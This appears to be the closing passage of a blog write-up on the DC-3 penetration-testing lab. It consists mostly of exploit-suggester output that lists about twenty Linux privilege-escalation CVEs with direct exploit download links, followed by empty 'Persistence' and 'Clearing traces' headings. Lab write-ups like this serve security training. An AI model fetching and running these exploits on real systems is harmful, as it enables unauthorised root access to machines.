81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-16995] eBPF_verifier

   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2016-8655] chocobo_root

   Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
   Exposure: highly probable
   Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
   Download URL: https://www.exploit-db.com/download/40871
   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-4557] double-fdput()

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: highly probable
   Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
            https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working

Then just take the CVE numbers listed above and try them.

IV. Persistence

V. Clearing traces

Summary

In short, a penetration test follows a series of steps: information gathering, vulnerability discovery and exploitation, access control testing and backdoor access. Finally, remediation advice is given for the vulnerabilities found and the testing process is summarised, providing guidance for improving the system's security.

              

Originally published on the WeChat public account Red Teams: DC-3

Published by admin on 2024-01-06 13:10:36
When reposting, please keep this link (CN-SEC; thanks to the original author): DC-3 https://cn-sec.com/archives/2363676.html
